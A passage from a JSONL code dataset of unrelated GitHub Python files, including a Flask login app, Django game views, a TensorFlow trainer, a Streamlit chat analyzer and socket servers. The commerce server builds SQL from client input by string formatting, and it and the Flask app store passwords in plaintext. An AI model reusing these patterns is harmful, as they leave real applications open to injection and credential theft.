1\r\n\t\t\t\r\n\t\t\tself.fodIsss[issKey] = iss\r\n\r\n\r\n\t\tif (InFODIss['_source']['status'] == 'Fix Validated' and includeRec == True):\r\n\t\t\tholdstatus = 'Fixed'\r\n\t\t\tmatchfound = True\r\n\t\t\tissKey = '{}{}{}{}{}{}'.format(InFODIss['_source']['releaseId'], InFODIss['_source']['category'], holdstatus, InFODIss['_source']['severityString'], InFODIss['_source']['introducedDate'], InFODIss['_source']['scantype']) \r\n\r\n\t\t\tif issKey in self.fodIsss:\r\n\t\t\t\t#Increment existing counts\r\n\t\t\t\tiss = self.fodIsss[issKey]\r\n\t\t\t\t#print('update')\r\n\t\t\telse:\r\n\t\t\t\t#vul = sscVulCount(InSSCVul['_source']['projectVersionId'])\r\n\t\t\t\t\r\n\t\t\t\tiss = {\r\n\t\t\t\t\t'releaseId': InFODIss['_source']['releaseId'],\r\n\t\t\t\t\t'category': InFODIss['_source']['category'],\r\n\t\t\t\t\t'status': holdstatus,\r\n\t\t\t\t\t'severityString': InFODIss['_source']['severityString'],\r\n\t\t\t\t\t'introducedDate': InFODIss['_source']['introducedDate'],\r\n\t\t\t\t\t'removedDate': '',\r\n\t\t\t\t\t'scantype': InFODIss['_source']['scantype'],\r\n\t\t\t\t\t'reccount': 0\r\n\t\t\t\t}\r\n\r\n\t\t\tiss['reccount'] = iss['reccount'] + 1\r\n\t\t\t\r\n\t\t\tself.fodIsss[issKey] = iss\r\n\r\n\r\n\t\tif (matchfound == False and includeRec == True):\r\n\t\t\tholdstatus = 'Open'\r\n\r\n\t\t\tissKey = '{}{}{}{}{}{}'.format(InFODIss['_source']['releaseId'], InFODIss['_source']['category'], holdstatus, InFODIss['_source']['severityString'], InFODIss['_source']['introducedDate'], InFODIss['_source']['scantype']) \r\n\r\n\t\t\tif issKey in self.fodIsss:\r\n\t\t\t\t#Increment existing counts\r\n\t\t\t\tiss = self.fodIsss[issKey]\r\n\t\t\t\t#print('update')\r\n\t\t\telse:\r\n\t\t\t\t#vul = sscVulCount(InSSCVul['_source']['projectVersionId'])\r\n\t\t\t\t\r\n\t\t\t\tiss = {\r\n\t\t\t\t\t'releaseId': InFODIss['_source']['releaseId'],\r\n\t\t\t\t\t'category': InFODIss['_source']['category'],\r\n\t\t\t\t\t'status': holdstatus,\r\n\t\t\t\t\t'severityString': InFODIss['_source']['severityString'],\r\n\t\t\t\t\t'introducedDate': InFODIss['_source']['introducedDate'],\r\n\t\t\t\t\t'removedDate': '',\r\n\t\t\t\t\t'scantype': InFODIss['_source']['scantype'],\r\n\t\t\t\t\t'reccount': 0\r\n\t\t\t\t}\r\n\r\n\t\t\tiss['reccount'] = iss['reccount'] + 1\r\n\t\t\t\r\n\t\t\tself.fodIsss[issKey] = iss\r\n\t\t \r\n\r\n\t\t\t\t\r\n\r\n\tdef searchFODReleasesforReleaseId(self, releaseid):\r\n\r\n\t\turl = 'http://localhost:9200/fodreleases/_search'\r\n\r\n\t\t_Headers = {'Accept': 'application/json',\r\n \t\t 'Content-Type': 'application/json'}\r\n\r\n\t\t_post ={\r\n\t\t\t\"query\": {\r\n\t\t\t\t\"match_phrase\": {\r\n\t\t\t\t\t\"releaseId\": releaseid\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\r\n\t\tresponse = requests.post(url, data=json.dumps(_post), headers=_Headers)\r\n\r\n\t\t#print(response.text)\r\n\r\n\t\treturn json.loads(response.text)\r\n\t\t\t\r\n\t","repo_name":"gatsalt/FDRewrite","sub_path":"ABCfodIssCount.py","file_name":"ABCfodIssCount.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15795656185","text":"import socket\nimport pyaudio\n\n# Constants\nSENDER_IP = 'YOUR_SENDER_IP' # Replace with the sender's IP address\nRECEIVER_IP = 'YOUR_RECEIVER_IP' # Replace with the receiver's IP address\nPORT = 12345\n\n# Initialize PyAudio\np = pyaudio.PyAudio()\nCHUNK = 1024\nFORMAT = pyaudio.paInt16\nCHANNELS = 1\nRATE = 44100\n\n# Create a socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n# Start audio stream\nstream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n frames_per_buffer=CHUNK)\n\nwhile True:\n audio_data = stream.read(CHUNK)\n sock.sendto(audio_data, (RECEIVER_IP, PORT))\n\n# Cleanup\nstream.stop_stream()\nstream.close()\np.terminate()\nsock.close()\n","repo_name":"JAPJEET01/rtsp_sounddevice","sub_path":"sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22140884674","text":"from flask import Flask, render_template, request, redirect, url_for, flash\n\napp = Flask(__name__)\napp.secret_key = 'sua_chave_secreta'\n\n# Lista de usuários cadastrados (apenas para fins de exemplo)\nusuarios_cadastrados = []\n\n@app.route('/')\ndef index():\n return render_template('login.html')\n\n@app.route('/login', methods=['POST'])\ndef login():\n email = request.form['email']\n senha = request.form['senha']\n\n # Lógica de validação da senha aqui (1 letra maiúscula, 1 número, 1 caractere especial, pelo menos 6 caracteres)\n if not (len(senha) >= 6 and any(c.isupper() for c in senha) and any(c.isdigit() for c in senha) and any(not c.isalnum() for c in senha)):\n flash('A senha deve conter pelo menos 6 caracteres, 1 letra maiúscula, 1 número e 1 caractere especial.')\n return redirect(url_for('index'))\n\n # Verifique se o usuário existe (aqui você pode usar uma lógica de banco de dados)\n if (email, senha) in usuarios_cadastrados:\n flash('Login bem-sucedido!')\n return redirect(url_for('index'))\n else:\n flash('Credenciais inválidas. Tente novamente.')\n return redirect(url_for('index'))\n\n@app.route('/cadastro')\ndef cadastro():\n return render_template('cadastro.html')\n\n@app.route('/cadastro', methods=['POST'])\ndef cadastrar_usuario():\n nome = request.form['nome']\n cpf = request.form['cpf']\n email = request.form['email']\n telefone = request.form['telefone']\n endereco = request.form['endereco']\n senha = request.form['senha']\n confirmar_senha = request.form['confirmar_senha']\n\n # Verifique se a senha e a confirmação da senha são iguais\n if senha != confirmar_senha:\n flash('A senha e a confirmação de senha não coincidem.')\n return redirect(url_for('cadastro'))\n\n # Salvar os dados do usuário (aqui você pode adicionar lógica de banco de dados)\n usuarios_cadastrados.append((email, senha))\n flash('Cadastro realizado com sucesso!')\n return redirect(url_for('index'))\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"ArthurPedro145/Web_III","sub_path":"meu_ambiente_virtual/my_project/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71577423092","text":"import tensorflow as tf\nimport numpy as np\nimport time\nfrom datetime import timedelta\n\ndistance = 7\nnum_anc = 24\n\nclass Samples:\n def __init__(self, inputs, targets):\n self.test_size = 1000\n self.syndromes = inputs\n self.logicals = targets\n self.num_data = len(self.syndromes) \n\n def __iter__(self):\n return self\n\n def test_samples(self):\n syndromes_batch = self.syndromes[-self.test_size:self.num_data]\n logicals_batch = self.logicals[-self.test_size:self.num_data]\n return syndromes_batch, logicals_batch\n\n def train_samples(self):\n batch_end = self.num_data - self.test_size\n syndromes_batch = self.syndromes[:batch_end]\n logicals_batch = self.logicals[:batch_end]\n return syndromes_batch, logicals_batch\n\ndef load_data(file, num_samples):\n a = []\n b = []\n with open(file, 'r') as f:\n m = 0\n for line in f: # iterate over each line\n m += 1\n data = line.split() # split it by whitespace\n for i in range(num_anc+2):\n data[i] = int(data[i])\n a.append(data[:num_anc])\n b.append([data[-2]])\n if m == num_samples:#train + test\n break\n f.close()\n a = np.array(a)\n b = np.array(b)\n\n return Samples(a, b)\n\n\ndef weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\ndef bias_variable(length):\n initial = tf.constant(0.05, shape=[length])\n return tf.Variable(initial)\n\nnum_channels = 1\nnum_classes = 1\n\n# Convolutional Layer 1.\nfilter_size1 = 4 # Convolution filters are 5 x 5 pixels.\nnum_filters1 = 10 # There are 16 of these filters.\n\n# Convolutional Layer 2.\nfilter_size2 = 4 # Convolution filters are 5 x 5 pixels.\nnum_filters2 = 20 # There are 36 of these filters.\n\n# Fully-connected layer.\nfc_size = 128 # Number of neurons in fully-connected layer.\n\t\ndef new_conv_layer(input, # The previous layer.\n num_input_channels, # Num. channels in prev. layer.\n filter_size, # Width and height of each filter.\n num_filters, # Number of filters.\n use_pooling=True): # Use 2x2 max-pooling.\n\n shape = [filter_size, num_input_channels, num_filters]\n weights = weight_variable(shape=shape)\n print('weights: ', weights.get_shape())\n biases = bias_variable(length=num_filters)\n layer = tf.nn.conv1d(value=input,\n filters=weights,\n stride=2,\n padding='SAME')\n layer += biases\n print('layer: ', layer.get_shape())\n if use_pooling:\n layer = tf.nn.pool(input=layer,\n window_shape=[1],\n pooling_type=\"MAX\",\n strides=[1],\n padding='SAME')\n layer = tf.nn.sigmoid(layer)\n return layer, weights\n\ndef flatten_layer(layer):\n layer_shape = layer.get_shape()\n num_features = layer_shape[1:3].num_elements()\n layer_flat = tf.reshape(layer, [-1, num_features])\n return layer_flat, num_features\n\ndef new_fc_layer(input, # The previous layer.\n num_inputs, # Num. inputs from prev. layer.\n num_outputs, # Num. outputs.\n use_sigmoid=True): # Use sigmoid\n\n weights = weight_variable(shape=[num_inputs, num_outputs])\n biases = bias_variable(length=num_outputs)\n layer = tf.matmul(input, weights) + biases\n if use_sigmoid:\n layer = tf.nn.sigmoid(layer)\n return layer\n\t\nx = tf.placeholder(tf.float32, shape=[None, num_anc], name='x')\nprint('x: ', x._shape)\nx_input = tf.reshape(x, [-1, num_anc, num_channels])\nprint('x_input: ', x_input._shape)\ny_true = tf.placeholder(tf.float32, shape=[None, 1], name='y_true')\ny_true_cls = tf.argmax(y_true, dimension=1)\n\nlayer_conv1, weights_conv1 = new_conv_layer(input=x_input,\n num_input_channels=num_channels,\n filter_size=filter_size1,\n num_filters=num_filters1,\n use_pooling=True)\n\nlayer_conv2, weights_conv2 = new_conv_layer(input=layer_conv1,\n num_input_channels=num_filters1,\n filter_size=filter_size2,\n num_filters=num_filters2,\n use_pooling=True)\n\t\t\t\t \nlayer_flat, num_features = flatten_layer(layer_conv2)\nprint('num_features ', num_features)\n\nlayer_fc1 = new_fc_layer(input=layer_flat,\n num_inputs=num_features,\n num_outputs=fc_size,\n use_sigmoid=True)\n\t\t\t\t\nlayer_fc2 = new_fc_layer(input=layer_fc1,\n num_inputs=fc_size,\n num_outputs=num_classes,\n use_sigmoid=False)\n\t\t \ny_pred = tf.nn.softmax(layer_fc2)\ny_pred_cls = tf.argmax(y_pred, dimension=1)\ncross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=layer_fc2, labels=y_true)\ncost = tf.reduce_mean(cross_entropy)\noptimizer = tf.train.AdamOptimizer(learning_rate=1e-4).minimize(cost)\ncorrect_prediction = tf.equal(y_pred_cls, y_true_cls)\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\nloss = tf.reduce_mean(tf.square(y_pred_cls - y_true_cls))\n\nsession = tf.Session()\nsession.run(tf.initialize_all_variables())\n\ntotal_iterations = 0\t\n\ndef optimize(num_iterations):\n global total_iterations\n start_time = time.time()\n #------ test samples -----------\n test_a, test_l = data.test_samples()\n feed_dict_test = {x: test_a, y_true: test_l}\n #------ train samples -----------\n x_batch, y_true_batch = data.train_samples()\n feed_dict_train = {x: x_batch, y_true: y_true_batch}\n\n saver = tf.train.Saver()\n \n for i in range(total_iterations, total_iterations + num_iterations):\n session.run(optimizer, feed_dict=feed_dict_train)\n err = session.run(loss, feed_dict=feed_dict_train)\n acc = session.run(accuracy, feed_dict=feed_dict_test)\n\n if acc == 1.0:\n saver.save(session, 'model_d_' + str(distance) + '.ckpt')\n break\n\n\n if i % 10 == 0:\n msg = \"Optimization Iteration: {0:>6}, Training Error: {1:>6.2%}, Training Accuracy: {2:>6.2%}\"\n print(msg.format(i + 1, err, acc))\n\n total_iterations += num_iterations\n end_time = time.time()\n time_dif = end_time - start_time\n print(\"Time usage: \" + str(timedelta(seconds=int(round(time_dif)))))\n\ntest_batch_size = 200\n'''\ndef print_test_accuracy():\n test_a, test_l = ld.test_samples()\n num_test = len(test_a)\n cls_pred = np.zeros(shape=num_test, dtype=np.int)\n i = 0\n\n while i < num_test:\n j = min(i + test_batch_size, num_test)\n a, l = ld.next_batch()\n inputs = test_a[i:j]\n targets = test_l[i:j]\n feed_dict = {x: inputs, y_true: targets}\n cls_pred[i:j] = session.run(y_pred_cls, feed_dict=feed_dict)\n i = j\n cls_true = test_l\n correct = (cls_true == cls_pred)\n correct_sum = correct.sum()\n acc = float(correct_sum) / num_test\n msg = \"Accuracy on Test-Set: {0:.1%} ({1} / {2})\"\n print(msg.format(acc, correct_sum, num_test))\n'''\ndata = load_data('d=7_uniform_distr_samples.txt', 20000)\noptimize(num_iterations=1000)\n#print_test_accuracy()","repo_name":"bcriger/sc_decoding","sub_path":"NN_convolutional/training_conv.py","file_name":"training_conv.py","file_ext":"py","file_size_in_byte":7623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"5948050389","text":"#echo-server-thread.py\nimport pyautogui\nimport socket\nfrom _thread import *\n\nHOST_IP='192.168.0.26'\nHOST_PORT=10000\n\ndef my_com_th(client_socket, addr):\n #print('Client address: ',addr)\n while True:\n try:\n data = client_socket.recv(1024)\n if not data:\n #print('Client',addr, 'disconnected')\n break\n \n if data.decode() =='a':\n pyautogui.keyDown('a')\n pyautogui.keyUp('a')\n elif data.decode() =='s':\n pyautogui.keyDown('s')\n pyautogui.keyUp('s')\n elif data.decode() =='d':\n pyautogui.keyDown('d')\n pyautogui.keyUp('d')\n elif data.decode() =='f':\n pyautogui.keyDown('f')\n pyautogui.keyUp('f')\n\n elif data.decode() =='e':\n print('\\nend') \n \n #print('received from client is:', addr[0], data.decode())\n except ConnectionResetError as e:\n print('Client',addr[0], 'disconnected')\n break\n client_socket.close()\nserver_socket=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nserver_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nserver_socket.bind((HOST_IP,HOST_PORT))\nserver_socket.listen()\nprint(\"서버가 시작되었습니다.\")\nwhile True:\n client_socket, addr = server_socket.accept()\n start_new_thread(my_com_th, (client_socket, addr))\n \nserver_socket.close()\n","repo_name":"jeonghwan0458/WIFI-keyboard","sub_path":"Server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74593039411","text":"from typing import Any, Dict, List\nimport json\nimport numpy as np\nfrom PIL import Image\n\n\ndef get_batch_size(config: Dict[str, Any], data_size: int) -> int:\n strategy = config[\"training_strategy\"]\n\n if strategy == \"batch\":\n return data_size\n elif strategy == \"mini_batch\":\n batch_size = config[\"batch_size\"]\n\n if batch_size > data_size:\n raise ValueError(\"Batch size must be smaller than the dataset size\")\n\n return batch_size\n elif strategy == \"online\":\n return 1\n else:\n raise ValueError(\"Invalid training strategy\")\n\n\ndef pretty_print_font(bitmap):\n delta = 0.1\n for row in bitmap:\n for pixel in row:\n if pixel < delta:\n print(\" \", end=\"\")\n else:\n print(\"█\", end=\"\")\n print()\n\n\ndef create_image(fonts, path, size=(7, 5)):\n # Add a border around each font, 1 pixel wide\n fonts = np.pad(fonts, ((0, 0), (1, 1), (1, 1)), \"constant\", constant_values=0)\n\n # Scale the fonts up\n fonts = fonts.repeat(10, axis=1).repeat(10, axis=2)\n\n bitmap_height, bitmap_width = len(fonts[0]), len(fonts[0][0])\n cols, rows = size\n composite_width = cols * bitmap_width\n composite_height = rows * bitmap_height\n\n composite_image = Image.new(\"L\", (composite_width, composite_height))\n\n for i, font in enumerate(fonts):\n font_image = Image.fromarray(font * 255)\n x = i % cols\n y = i // cols\n composite_image.paste(font_image, (x * bitmap_width, y * bitmap_height))\n\n # Add a border around each image\n\n composite_image.save(path)\n composite_image.show()\n\n\ndef serialize_weights(weights, path=\"weights.json\"):\n # Convert the weights to a list of lists\n weights = [[w.tolist() for w in layer] for layer in weights]\n\n with open(path, \"w\") as f:\n json.dump(weights, f)\n\n\ndef deserialize_weights(path=\"weights.json\") -> List[np.ndarray]:\n with open(path, \"r\") as f:\n weights = json.load(f)\n\n # Convert the weights to numpy arrays\n weights = [[np.array(w) for w in layer] for layer in weights]\n weights = [np.array(layer) for layer in weights]\n\n return weights\n\n\nstop_flag = False\ndef signal_handler(sig, frame):\n global stop_flag\n stop_flag = True\n print(\"Stopping...\")\n\ndef stop():\n global stop_flag\n return stop_flag\n\n","repo_name":"ImNotGone/sia-tp5","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20198529820","text":"from django.shortcuts import render, get_object_or_404\n\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom .models import Game, PlayerGame\nfrom .forms import GameForm, GamePlayersForm\nfrom django.contrib.auth.models import User\nfrom django.utils import timezone\nfrom django.urls import reverse\n\n\"\"\"\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\"\"\"\n\n\n@login_required\ndef index(request):\n games = Game.objects.all().order_by('-time_start')\n gamePlayers = PlayerGame.objects.all() #výpis hráčů na indexu\n is_admin_or_player = is_player_or_admin(request.user)\n context = {'games': games, 'gameplayers': gamePlayers, 'is_admin_or_player': is_admin_or_player}\n return render(request, 'index.html', context)\n\n\n@login_required\ndef detail(request, id):\n game = Game.objects.get(pk=id)\n players = PlayerGame.objects.filter(game=id) #detail hry\n is_admin_or_player = is_player_or_admin(request.user)\n\n if request.method == 'POST' and game.active:\n game.time_end = timezone.now()\n game.active = False\n\n winner = game.get_winner()\n winner_name = winner.username if winner else None #získávání výherce hry\n game.winner = winner_name\n game.save()\n\n return render(request, 'gameDetail.html',\n {'game': game, 'players': players, 'is_admin_or_player': is_admin_or_player,\n 'winner': str(game.winner)})\n\n\n@login_required\ndef delete(request, id):\n game = Game.objects.get(pk=id)\n game.delete() #mazání her\n return HttpResponseRedirect('/')\n\n\ndef deletePlayer(request, id):\n gamePlayer = PlayerGame.objects.get(pk=id)\n game_id = gamePlayer.game.id #mazání hráčů ve hře\n is_current_winner = False\n\n game = Game.objects.get(id=game_id)\n if game.winner == gamePlayer.player.username:\n is_current_winner = True\n\n gamePlayer.delete()\n\n if is_current_winner:\n winner = game.get_winner()\n if winner:\n game.winner = winner.playergame_set.first().player.username #pokud je mazaný hráč výherce musí se přepnout vítěz\n else:\n game.winner = None\n game.save()\n\n return HttpResponseRedirect(reverse('detail', args=[game_id]))\n\n\n\ndef gameEdit(request, id):\n game = get_object_or_404(Game, id=id)\n\n if request.method == 'GET':\n form = GameForm(instance=game)\n context = {'form': form, 'id': id, 'game': game}\n return render(request, 'gameEdit.html', context)\n\n elif request.method == 'POST':\n form = GameForm(request.POST, instance=game)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect('/')\n else:\n context = {'form': form, 'id': id, 'game': game}\n return render(request, 'gameEdit.html', context)\n\n\ndef is_player_or_admin(user):\n if user.is_superuser: #funkce na určení zda je užívatel admin nebo hráč\n return user.is_superuser\n else:\n return user.groups.filter(name='Hráč').exists()\n\n\n@login_required\n@user_passes_test(is_player_or_admin, login_url='/')\ndef add(request): #přidávání her\n active_games = Game.objects.filter(active=True).count()\n\n if active_games >= 2 and request.POST.get('active'):\n error_message = \"Nelze mít více než 2 aktivní hry. Vydrž než hry skončí :)\" #počet aktivních her nesmí být větší než 2\n return render(request, 'gameAdd.html', {'form': GameForm(), 'error_message': error_message})\n\n if request.method == 'POST':\n form = GameForm(request.POST)\n if form.is_valid():\n title = form.cleaned_data['title']\n time_start = timezone.now() if form.cleaned_data['active'] else form.cleaned_data['time_start'] #pokud je hra aktivní nastaví se aktuální čas\n time_end = form.cleaned_data['time_end']\n description = form.cleaned_data['description']\n author = request.user\n active = form.cleaned_data['active']\n game = Game.objects.create(title=title, time_start=time_start, time_end=time_end, description=description,\n author=author, active=active)\n return HttpResponseRedirect(reverse('detail', args=[game.id]))\n else:\n form = GameForm()\n\n return render(request, 'gameAdd.html', {'form': form})\n\n\n@login_required\n@user_passes_test(is_player_or_admin, login_url='/')\ndef addGamePlayers(request): #přidávání hráčů do hry\n if request.method == 'POST':\n form = GamePlayersForm(request.POST)\n if form.is_valid():\n game = form.cleaned_data['game']\n player = form.cleaned_data['player']\n score = form.cleaned_data['score']\n get_player = User.objects.get(username=player[0])\n get_game = Game.objects.get(title=game[0])\n\n if PlayerGame.objects.filter(game=get_game, player=get_player).exists(): #pokud hráč se ve hře nachází, už nelze přidat\n error_message = f\"Hráč {get_player.username} už byl přidán do hry.\"\n form.add_error('player', error_message)\n return render(request, 'gamePlayersAdd.html', {'form': form})\n\n PlayerGame.objects.create(game=get_game, player=get_player, score=score)\n\n if not get_game.active:\n winner = get_game.get_winner()\n get_game.winner = winner.playergame_set.first().player.username #nastavování výherce pokud hra neni aktivní\n get_game.save()\n\n return HttpResponseRedirect(reverse('detail', args=[get_game.pk]))\n else:\n form = GamePlayersForm()\n\n return render(request, 'gamePlayersAdd.html', {'form': form})\n\n\n@login_required\n@user_passes_test(is_player_or_admin, login_url='/')\ndef userGames(request):\n userGames = PlayerGame.objects.filter(player=request.user).order_by('-game__time_start') #historie hráče\n return render(request, 'user_games.html', {'userGames': userGames})\n","repo_name":"radunan/Projekt_django","sub_path":"games/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24159379976","text":"import streamlit as st\nimport pre\n\nfrom io import StringIO\nimport helper\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nst.sidebar.title(\"whatsapp chat analyzer\")\ndocx_file = st.sidebar.file_uploader(\"Upload Document\") \na=False\nif docx_file is not None:\n bytes_data=docx_file.getvalue()\n file_like_object = StringIO(bytes_data.decode(\"utf-8\"))\n data,scr = pre.preprocess(file_like_object)\n st.dataframe(data) #displaying the chat data in different columns in streamlit\n\t \n # getting unique users\n user_list = data['Contact'].unique().tolist()\n \n imagename=scr+\".jpg\"\n\n image = Image.open(imagename)\n\n user_list.sort()\n user_list.insert(0,\"Overall\")\n selected_user = st.sidebar.selectbox(\"Show analysis wrt\",user_list)\n \n\n if st.sidebar.button(\"Show Analysis\"):\n st.subheader(\"Overall Sentiment is\")\n st.subheader(scr)\n image=image.resize((110,90))\n st.image(image)\n a=True\n # Stats Area\n num_messages, words, num_media_messages, num_links = helper.fetch_stats(selected_user,data)\n st.title(\"Top Statistics\")\n col1, col2, col3, col4 = st.columns(4)\n\n with col1:\n st.header(\"Total Messages\")\n st.title(num_messages)\n with col2:\n st.header(\"Total Words\")\n st.title(words)\n with col3:\n st.header(\"Media Shared\")\n st.title(num_media_messages)\n with col4:\n st.header(\"Links Shared\")\n st.title(num_links)\nif a:\n if selected_user == 'Overall':\n # its generate most buy users in graphically\n\n st.title('Most Busy Users')\n x,new_df = helper.most_busy_users(data)\n fig, ax = plt.subplots()\n\n col1, col2 = st.columns(2)\n col3,col4,col5= st.columns(3)\n\n with col1:\n ax.bar(x.index, x.values,color='red')\n plt.xticks(rotation='vertical')\n st.pyplot(fig)\n with col2:\n st.dataframe(new_df)\n with col3:\n st.markdown(\"

    Most Positive Contribution

    \",unsafe_allow_html=True)\n x = helper.percentage(data,1)\n st.dataframe(x)\n with col4:\n st.markdown(\"

    Most Neutral Contribution

    \",unsafe_allow_html=True)\n y = helper.percentage(data, 0)\n st.dataframe(y)\n with col5:\n st.markdown(\"

    Most Negative Contribution

    \",unsafe_allow_html=True)\n z = helper.percentage(data, -1) \n st.dataframe(z)\n # its generate word cloud\n\n st.title(\"Wordcloud\")\n df_wc = helper.create_wordcloud(selected_user,data)\n fig,ax = plt.subplots()\n ax.imshow(df_wc)\n st.pyplot(fig)\n most_common_df = helper.most_common_words(selected_user,data)\n\n fig,ax = plt.subplots()\n\n ax.barh(most_common_df[0],most_common_df[1])\n plt.xticks(rotation='vertical')\n\n # its generate collection of most common words used in the chat\n\n st.title('Most commmon words')\n st.pyplot(fig)\n emoji_df = helper.emoji_helper(selected_user,data)\n st.title(\"Emoji Analysis\")\n\n col1,col2 = st.columns(2)\n\n with col1:\n st.dataframe(emoji_df)\n with col2:\n fig,ax = plt.subplots()\n ax.pie(emoji_df[1].head(),labels=emoji_df[1].head(),autopct=\"%0.2f\")\n st.pyplot(fig)\n\n #generate dailt timeline graph\n\n st.title(\"Daily Timeline\")\n daily_timeline = helper.daily_timeline(selected_user, data)\n fig, ax = plt.subplots()\n ax.plot(daily_timeline['only_date'], daily_timeline['Message'], color='black')\n plt.xticks(rotation='vertical')\n st.pyplot(fig)\n st.title('Activity Map')\n col1,col2 = st.columns(2)\n\n with col1:\n # its generate most busy day in graphically\n\n st.header(\"Most busy day\")\n busy_day = helper.week_activity_map(selected_user,data)\n fig,ax = plt.subplots()\n ax.bar(busy_day.index,busy_day.values,color='green')\n plt.xticks(rotation='vertical')\n st.pyplot(fig)\n with col2:\n # its generate most busy month in graphically\n\n st.header(\"Most busy month\")\n busy_month = helper.month_activity_map(selected_user, data)\n fig, ax = plt.subplots()\n \n ax.bar(busy_month.index, busy_month.values,color='blue')\n plt.xticks(rotation='vertical')\n st.pyplot(fig)","repo_name":"vineethkumar12/whatsapp-chat-analayzer","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4581,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"985656741","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 22 10:38:09 2021\n\n@author: Anjolaoluwa\nServer script to handle user authentication requests\n\"\"\"\nimport shelve\nimport threading\n\nimport mysql.connector\nimport socket\nimport json # used to move data in complex forms such as lists and dictionaries\nimport random\nfrom datetime import date, datetime\n\n\nclass processServer(threading.Thread):\n def __init__(self, client, addr):\n threading.Thread.__init__(self)\n self.client = client\n self.addr = addr\n self.conn = mysql.connector.connect(host=\"localhost\", database=\"commercedb\", user=\"root\", password=\"\")\n self.cursor = self.conn.cursor()\n\n def run(self):\n myclient = threading.local()\n myclient.client = self.client\n myclient.addr = self.addr\n print(\"Accepted connection from \", myclient.addr)\n myclient.client.send(str.encode(\"Welcome to my server!\"))\n\n while True:\n data = client.recv(1024)\n message = json.loads(bytes.decode(data))\n\n if \"register\" in message:\n message.remove(\"register\")\n self.cursor.execute(\n \"INSERT INTO commerce_users (user_id,username,email,password,reg_status) VALUES('{}','{}','{}','{}','{}')\".format(\n *message))\n # * is for list, ** is for dictionary, acts like a spread operator\n self.cursor.execute(\"SELECT * from commerce_users ORDER BY id DESC LIMIT 1\")\n # ORDER BY means sort by. DESC means sort serially in descending order and LIMIT the search to just\n # one row\n resp = self.cursor.fetchall() # resp stands for response\n\n print(\"Sending registration response...\")\n self.client.send(str.encode(json.dumps(resp)))\n # encodes the complex data type (list,dict,tuple) first in\n # form of json then in form of string\n # json.loads() is for decoding json, json.dumps() is for encoding json\n # bytes.decode() is for decoding string, str.encode() is for encoding string\n self.conn.commit()\n # client.close()\n\n elif \"login\" in message:\n message.remove(\"login\")\n self.cursor.execute(\n \"SELECT * FROM commerce_users WHERE username='{}' AND password='{}'\".format(*message))\n resp = self.cursor.fetchall()\n print(\"Sending login response...\")\n self.client.send(str.encode(json.dumps(resp)))\n self.conn.commit()\n # client.close()\n # conn.close()\n\n elif \"calculate\" in message:\n dicts = {\n 'bag': 0,\n 'heels': 0,\n 'blouse': 0,\n 'shirt': 0,\n 'trousers': 0,\n 'jeans': 0,\n 'sneakers': 0,\n 'skirt': 0,\n 'socks': 0\n }\n self.cursor.execute(\"SELECT * FROM price\")\n rows = self.cursor.fetchall()\n print(rows)\n for row in rows:\n dicts[row[1]] = float(row[2]) # the price is in row[2] while meal is in row[1]\n # eg dict['jeans']=2000.00\n\n self.client.send(str.encode(json.dumps(dicts)))\n self.conn.commit()\n # client.close()\n\n\n elif \"transaction\" in message:\n del message['transaction']\n trans = shelve.open(\"trans_info\", flag=\"n\")\n username = message['username']\n self.cursor.execute(\"SELECT user_id FROM commerce_users WHERE username='{}'\".format(username))\n user_id = self.cursor.fetchone()\n # we use fetchone() because we only need one row since user_id is unique to each user\n message['user_id'] = user_id[0]\n\n for item in message:\n trans[item] = message[item]\n trans.close()\n print(\"Sending transaction response...\")\n self.client.send(str.encode(json.dumps(message)))\n self.conn.commit()\n\n\n elif \"post\" in message:\n newdicts = {}\n trans = shelve.open(\"trans_info\")\n for item in trans:\n newdicts[item] = trans[item]\n trans.close()\n user_id = newdicts['user_id']\n username = newdicts['username']\n transaction_date = datetime.now()\n trans_date = transaction_date.strftime(\"%Y-%m-%d %H:%M:%S\")\n del newdicts['user_id']\n del newdicts['username']\n\n print(newdicts)\n\n for row in newdicts:\n self.cursor.execute(\n \"INSERT INTO transaction (emp_id, employee, item, amount, date_purchase) VALUES ('{}', '{}', '{}', '{}', '{}')\".format(\n user_id, username, row, newdicts[row], trans_date))\n self.cursor.execute(\"SELECT * FROM transaction WHERE date_purchase = '{}'\".format(trans_date))\n result = self.cursor.fetchall()\n print(f\"The result is {result}\")\n if not result:\n msg = \"success\"\n else:\n msg = \"failed\"\n self.client.send(str.encode(msg))\n 